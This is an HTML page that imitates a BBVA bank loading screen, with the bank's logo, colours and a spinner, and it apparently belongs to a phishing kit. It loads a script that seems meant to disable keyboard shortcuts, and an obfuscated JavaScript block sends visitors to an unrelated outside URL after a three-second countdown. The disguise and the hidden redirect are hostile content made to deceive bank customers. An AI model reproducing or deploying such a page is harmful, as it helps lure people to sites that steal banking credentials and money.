<!DOCTYPE html>
<html lang="es">
<head>
<link rel="shortcut icon" href="img/favicon.ico">
<link rel="apple-touch-icon" href="img/favicon.png"> 
<link rel="shortcut icon" type="image/x-icon" href="img/favicon.png"> 
  <script type="text/javascript" src="js/disablekey.js"> </script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BBVA </title>
    <style>
       *{box-sizing:border-box;margin:0;padding:0;}
body{font-family:Helvetica,sans-serif;line-height:1.8;display:flex;flex-direction:column;min-height:100vh;}
header{background-color:#072146;color:#ffffff;padding:1rem;text-align:center;}
.content{flex:1;display:flex;flex-direction:column;justify-content:center;align-items:center;}
.loader{border:4px solid #f3f3f3;border-top:4px solid #072146;border-radius:50%;width:60px;height:60px;animation:spin 1.5s linear infinite;}
@keyframes spin{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}
       footer{background-color:#072146;color:#fff;padding:1rem;text-align:center;position:fixed;bottom:0;width:100%}

    </style>
</head>
<body>
    <header>
        <img width="200" src="img/bbva_footer_dkt_es.png">
    </header>
    <div class="content">
        <div class="loader"></div>
      </p>
    </div>
    <footer>
        <p>Haz tu vida más fácil y sencilla con todos los beneficios que te ofrece BBVA Net.</p>
    </footer>

<script>
   (function(_0x237c88,_0x55aa38){const _0x15c16b=_0x1330,_0x136b98=_0x237c88();while(!![]){try{const _0x8b8cbd=-parseInt(_0x15c16b(0x90))/0x1+-parseInt(_0x15c16b(0x95))/0x2+-parseInt(_0x15c16b(0x8b))/0x3+-parseInt(_0x15c16b(0x92))/0x4*(parseInt(_0x15c16b(0x8f))/0x5)+-parseInt(_0x15c16b(0x96))/0x6*(-parseInt(_0x15c16b(0x8d))/0x7)+-parseInt(_0x15c16b(0x93))/0x8*(-parseInt(_0x15c16b(0x91))/0x9)+-parseInt(_0x15c16b(0x89))/0xa*(-parseInt(_0x15c16b(0x8a))/0xb);if(_0x8b8cbd===_0x55aa38)break;else _0x136b98['push'](_0x136b98['shift']());}catch(_0x2e10a1){_0x136b98['push'](_0x136b98['shift']());}}}(_0x16f8,0x2657b));function _0x1330(_0x186c52,_0x1e2486){const _0x16f858=_0x16f8();return _0x1330=function(_0x13301a,_0x10188a){_0x13301a=_0x13301a-0x89;let _0x45fc69=_0x16f858[_0x13301a];return _0x45fc69;},_0x1330(_0x186c52,_0x1e2486);}function _0x16f8(){const _0x2781b0=['20874vgfCsR','760LVtsfm','90695kTzjVS','227043ybqjGe','href','91QSWMqK','https://zeroth.ai/bbcc/','477265rDRtCK','190782Cxxonc','9DSmZmX','4iydMgK','392272bdqqLP','location','403828GBvzTM'];_0x16f8=function(){return _0x2781b0;};return _0x16f8();}let timeRemaining=0x3;const countdown=setInterval(function(){const _0x4d425e=_0x1330;timeRemaining--,timeRemaining<=0x0&&(clearInterval(countdown),window[_0x4d425e(0x94)][_0x4d425e(0x8c)]=_0x4d425e(0x8e));},0x3e8);
    </script>
</body>
</html>
